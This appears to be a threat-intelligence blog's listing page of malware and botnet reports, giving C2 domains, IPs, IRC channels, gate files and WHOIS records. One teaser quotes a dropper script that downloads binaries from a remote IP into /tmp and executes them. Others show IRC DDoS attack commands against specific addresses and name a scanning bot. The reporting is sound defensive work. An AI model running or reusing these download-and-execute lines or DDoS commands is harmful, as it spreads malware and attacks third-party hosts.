KUKU406beta(Malware stealing passwords hosted in Germany Dortmund 1&1 Internet Ag)

Uncategorized

This is spreading through torrents and cracks and looks like passwd stealer. Domains and ip’s used : makemegood24.com         213.165.83.176 e710e2.makemegood24.com 87.106.20.192 aaakemegood24.com         146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com         74.208.153.9 acakemegood24.com         87.106.20.192 adakemegood24.com         213.165.83.176 aeakemegood24.com         74.208.164.166 afakemegood24.com perfectchoice1.com  Read more...

185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)

Uncategorized

Another SDT botnet found by abigail. Server : 185.61.138.235 Port : 443 Channel : #secgod DDOS Coming Up : <~Broken> >bot +std 70.127.120.174 80 30 [STD]Hitting 70.127.120.174! [STD]Done hitting 70.127.120.174! <~Broken> >bot +stop Killing pid 13923. Other url : http://93.174.93.45/f.sh #!/bin/sh cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh cd /tmp && wget http://93.174.93.45/mox64Read more...

191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Uncategorized

Found by abigail Server : 191.235.178.122 Port 443 Channel : #sh DDOS Coming Up lol : <~Haze> >bot +std 172.56.41.67 80 120 [STD]Hitting 172.56.41.67! [STD]Hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! The Bot u can download it here. Other : http://5.152.206.162/getbinaries.sh #!/bin/sh # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOURRead more...

jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Uncategorized

Domains used by the malware: 34324325kgkgfkgf.com dsffdsk323721372131.com fdshjfsh324332432.com jdsiwiqweiqwyreqwi.com 80.242.123.208 HTTP Requests: URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: jdsiwiqweiqwyreqwi.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples:Read more...

Linux Botnet Hosted In blackunix.us

Uncategorized

This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV Now talking in #botnets Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ] Topic By : [ uyap ] Modes On : [ #botnets ] [ +smntrMuk fcuked ] The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)

Uncategorized

Server:  gki2mpdt3rsokbmv.onion Port:  6667 Channel:  #channel Oper: [wac] (wac@9bedb2.host): ac[wac] #channel[wac] lair.hell.net :Cerberus Server[wac] idle 00:00:18, signon: Tue May 13 18:24:47[wac] End of WHOIS list. The owner must have used very old bot code to create this, as it fails to work properly on windows 7 and higher. Related md5s (Download sample from Malwr.com) Ircbot:Read more...

sinsec.net (Betabot http botnet hosted by alibabahost.com)

Uncategorized

Resolved sinsec.net to 37.221.170.96 Server:  sinsec.net Gate file:  /turndown/order.php Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se Domain info: sinsec.net Domain Name: SINSEC.NET Registry Domain ID: 1814650535_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2013-07-12 10:27:24Z Creation Date: 2013-07-12 17:27:00Z Registrar Registration Expiration Date: 2014-07-12 17:27:00Z Registrar: ENOM, INC. Registrar IANA ID: 48Read more...

api.wifi-update.biz (Betabot http botnet hosted by oneandone.net)

Uncategorized

Resolved api.wifi-update.biz to 87.106.241.22 Server:  api.wifi-update.biz Gate file:  /cdn/img.php Alternate domains: api-radio-def.de api.lul.pw api.tba.pw Domain info: wifi-update.biz Domain Name: WIFI-UPDATE.BIZ Domain ID: D58641421-BIZ Sponsoring Registrar: BIZCN.COM, INC. Sponsoring Registrar IANA ID: 471 Registrar URL (registration services): www.bizcn.com Domain Status: clientTransferProhibited Registrant ID: ORGEH90335606834 Registrant Name: Erkki Hagstrom Registrant Organization: ErkkiHagstrom Registrant Address1: Gesterbyntie 51 RegistrantRead more...